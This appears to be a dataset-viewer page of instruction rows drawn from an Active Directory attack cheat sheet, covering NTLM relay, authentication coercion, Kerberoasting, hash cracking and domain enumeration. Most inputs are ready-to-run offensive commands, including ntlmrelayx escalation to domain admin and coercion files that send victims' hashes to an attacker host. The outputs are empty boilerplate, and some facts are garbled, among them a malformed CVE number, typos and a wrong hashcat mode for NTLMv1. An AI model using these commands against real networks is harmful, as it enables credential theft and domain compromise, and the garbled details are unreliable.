instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
NTLM relay | HTTP(S) -> LDAP(S) | Note or procedural step under 'NTLM relay'. |
NTLM relay | Usually from webdev coerce | Note or procedural step under 'NTLM relay'. |
NTLM relay > To LDAP(S) | Relay to LDAP if LDAP signing and LDAPS channel binding not enfoeced (default) | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --add-computer <computer_name> <computer_password> --delegate-access #RBCD | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --shadow-credentials --shadow-target '<dc_name$>' #Shadow Credentials | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --escalate-user <user> #Domain Admin | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) | ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL | Note or procedural step under 'NTLM relay > To LDAP(S)'. |
NTLM relay > To LDAP(S) > To SMB | Relay to SMB (if SMB is not signed) | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'. |
NTLM relay > To LDAP(S) > To SMB | Find SMB not signed targets (default if not a Domain controler) | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'. |
NTLM relay > To LDAP(S) > To SMB | nxc smb <ip_range> --gen-relay-list smb_unsigned_ips.txt | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
NTLM relay > To LDAP(S) > To SMB | ntlmrelayx.py -tf smb_unsigned_ips.txt -smb2support [--ipv6] -socks #SMB Socks | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP | Relay to CA web enrollement | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP | Relay to WSUS | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL | ntlmrelayx.py -t mssql://<ip> [-smb2support] -socks | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | Zero-Logon (safe method) (CVE-202-1472) | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | Relay one dc to another | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | ntlmrelayx.py -t dcsync://<dc_to_ip> -smb2support -auth-smb <user>:<password> | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | To HTTP | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON | krbrelayx.py -t 'http://<pki>/certsrv/certfnsh.asp' --adcs --template DomainController -v '<target_netbios>$' -ip <attacker_ip> | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB | same as NTLM relay, use krbrelayx.py | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB'. |
NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S) | same as NTLM relay, use krbrelayx.py | Note or procedural step under 'NTLM relay > To LDAP(S) > To SMB > TO HTTP > To MsSQL > SMB -> NETLOGON > SMB -> SMB > SMB -> LDAP(S)'. |
LM (299bd128c1101fd6) | john --format=lm hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'LM (299bd128c1101fd6)'. |
LM (299bd128c1101fd6) | hashcat -m 3000 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'LM (299bd128c1101fd6)'. |
NT (b4b9b02e6f09a9bd760...) | john --format=nt hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'. |
NT (b4b9b02e6f09a9bd760...) | hashcat -m 1000 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'NT (b4b9b02e6f09a9bd760...)'. |
NTLMv1 (user::85D5BC...) | john --format=netntlm hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'NTLMv1 (user::85D5BC...)'. |
NTLMv1 (user::85D5BC...) | hashcat -m 1000 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'NTLMv1 (user::85D5BC...)'. |
NTLMv1 (user::85D5BC...) | crack.sh | Note or procedural step under 'NTLMv1 (user::85D5BC...)'. |
NTLMv2 (user::N46iSNek...) | john --format=netntlmv2 hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'. |
NTLMv2 (user::N46iSNek...) | hashcat -m 5600 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'NTLMv2 (user::N46iSNek...)'. |
Kerberos 5 TGS ($krb5tgs$23$...) | john --format=krb5tgs hash.txt --wordlist=<rockyou.txt> | Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'. |
Kerberos 5 TGS ($krb5tgs$23$...) | hashcat -m 13100 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'Kerberos 5 TGS ($krb5tgs$23$...)'. |
($krb5tgs$17...) | hashcat -m 19600 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under '($krb5tgs$17...)'. |
Kerberos ASREP ($krb5asrep$23...) | hashcat -m 18200 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'Kerberos ASREP ($krb5asrep$23...)'. |
($DCC2$10240...) | hashcat -m 2100 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under '($DCC2$10240...)'. |
($DCC2$10240...) | Timeroast hash ($sntp-ms$...) | Note or procedural step under '($DCC2$10240...)'. |
($DCC2$10240...) | hashcat -m 31300 -a 3 hash.txt -w 3 ?l?l?l?l?l?l?l | Tool or command referenced under '($DCC2$10240...)'. |
pxe hash ($sccm$aes128$...) | hashcat -m 19850 -a 0 hash.txt <rockyou.txt> | Tool or command referenced under 'pxe hash ($sccm$aes128$...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Find all users | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | GetADUsers.py -all -dc-ip <dc_ip> <domain>/<username> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | nxc smb <dc_ip> -u '<user>' -p '<password>' --users | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Enumerate SMB share | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | nxc smb <ip_range> -u '<user>' -p '<password>' -M spider_plus | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Classic Enumeration (users, shares, ACL, delegation, ...) | xc smb <ip_range> -u '<user>' -p '<password>' --shares [--get-file \\<filename> <filename>] | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | manspider <ip_range> -c passw -e <file extensions> -d <domain> -u <user> -p <password> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Bloodhound Legacy | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | rusthound -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain <domain> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | sharphound.exe -c all -d <domain> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Bloodhound CE | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | bloodhound-python -d <domain> -u <user> -p <password> -gc <dc> -c all | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | rusthound-ce -d <domain_to_enum> -u '<user>@<domain>' -p '<password>' -o <outfile.zip> -z --ldap-filter=(objectGuid=*) | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | sharphound.exe -c all -d <domain> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | SOAPHound.exe -c c:\temp\cache.txt --bhdump -o c:\temp\bloodhound-output --autosplit --threshold 900 | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Enumerate Ldap | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | ldeep ldap -u <users> -p '<password>' -d <domain> -s ldap://<dc_ip> all <backup_folder> | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | ldapdomaindump.py -u <user> -p <password> -o <dump_folder> ldap://<dc_ip>:389 | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | ldapsearch-ad.py -l <dc_ip> -d <domain> -u <user> -p '<password>' -o <output.log> -t all | Tool or command referenced under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | Enumerate DNS | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Classic Enumeration (users, shares, ACL, delegation, ...) | adidnsdump -u <domain>\\<user> -p "<password>" --print-zones <dc_ip> #New targets (low hanging fruit) | Note or procedural step under 'Classic Enumeration (users, shares, ACL, delegation, ...)'. |
Enumerate ADCS | certify.exe find | Note or procedural step under 'Enumerate ADCS'. |
Enumerate ADCS | certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc_ip> | Note or procedural step under 'Enumerate ADCS'. |
Enumerate SCCM | sccmhunter.py find -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug | Note or procedural step under 'Enumerate SCCM'. |
Enumerate SCCM | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> sccm | Note or procedural step under 'Enumerate SCCM'. |
Enumerate SCCM | SharpSCCM.exe local site-info | Note or procedural step under 'Enumerate SCCM'. |
Scan Auto | from BH result | Note or procedural step under 'Scan Auto'. |
Scan Auto | AD-miner -c -cf Report -u <neo4j_username> -p <neo4j_password> | Note or procedural step under 'Scan Auto'. |
Scan Auto | PingCastle.exe --healthcheck --server <domain> | Note or procedural step under 'Scan Auto'. |
Scan Auto | Import-Module .\adPEAS.ps1; Invoke-adPEAS -Domain '<domain>' -Server '<dc_fqdn>' | Note or procedural step under 'Scan Auto'. |
Kerberoasting | MATCH (u:User) WHERE u.hasspn=true AND u.enabled = true AND NOT u.objectid ENDS WITH '-502' AND NOT COALESCE(u.gmsa, false) = true AND NOT COALESCE(u.msa, false) = true RETURN u | Note or procedural step under 'Kerberoasting'. |
Kerberoasting | GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password> | Tool or command referenced under 'Kerberoasting'. |
Kerberoasting | Rubeus.exe kerberoast | Tool or command referenced under 'Kerberoasting'. |
Coerce | Drop file | Note or procedural step under 'Coerce'. |
Coerce | .lnk | Note or procedural step under 'Coerce'. |
Coerce | nxc smb <dc_ip> -u '<user>' -p '<password>' -M slinky -o NAME=<filename> SERVER=<attacker_ip> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Coerce | .scf | Note or procedural step under 'Coerce'. |
Coerce | nxc smb <dc_ip> -u '<user>' -p '<password>' -M sucffy -o NAME=<filename> SERVER=<attacker_ip> | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Coerce | .url | Note or procedural step under 'Coerce'. |
Coerce | [InternetShortcut]... IconFile=\\<attacker_ip>\%USERNAME%.icon | Note or procedural step under 'Coerce'. |
Coerce | Other files | Note or procedural step under 'Coerce'. |
Coerce | ntlm_theft.py -g all -s <your_ip> -f test | Note or procedural step under 'Coerce'. |
Coerce | Webdav | Note or procedural step under 'Coerce'. |
Coerce | Enable webclient | Note or procedural step under 'Coerce'. |
Coerce | .searchConnector-ms | Note or procedural step under 'Coerce'. |
Coerce | nxc smb <dc_ip> -u '<user>' -p '<password>' -M drop-sc | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Coerce | add attack computer in dns | Note or procedural step under 'Coerce'. |
Coerce | dnstool.py -u <domain>\<user> -p <pass> --record <attack_name> --action add --data <ip_attacker> <dc_ip> | Note or procedural step under 'Coerce'. |
Coerce | Launch coerce with <attacker_hostname>@80/x as target | Note or procedural step under 'Coerce'. |
Coerce | RPC call | Note or procedural step under 'Coerce'. |
Coerce | printerbug.py <domain>/<username>:<password>@<printer_ip> <listener_ip> | Note or procedural step under 'Coerce'. |
Coerce | petitpotam.py -d <domain> -u <user> -p <password> <listnerer_ip> <target_ip> | Note or procedural step under 'Coerce'. |
Coerce | coercer.py -d <domain> -u <user> -p <password> -t <target> -l <attacker_ip> | Note or procedural step under 'Coerce'. |
Coerce | Coerce kerberos | Note or procedural step under 'Coerce'. |
Coerce | dnstool.py -u "<domain>\<user>" -p '<password>' -d "<attacker_ip>" --action add "<dns_server_ip>" -r "<servername>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" --tcp | Note or procedural step under 'Coerce'. |
Coerce | petitpotam.py -u '<user>' -p '<password>' -d <domain> '<servername>1UWh...' <target> | Note or procedural step under 'Coerce'. |
Intra ID Connect | Find MSOL | Note or procedural step under 'Intra ID Connect'. |
Intra ID Connect | nxc ldap <dc_ip> -u '<user>' -p '<password>' -M get-desc-users |grep -i MSOL | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Can Connect to a computer | Lateral move | Note or procedural step under 'Can Connect to a computer'. |
Exploit | know vulnerabilities | Note or procedural step under 'Exploit'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.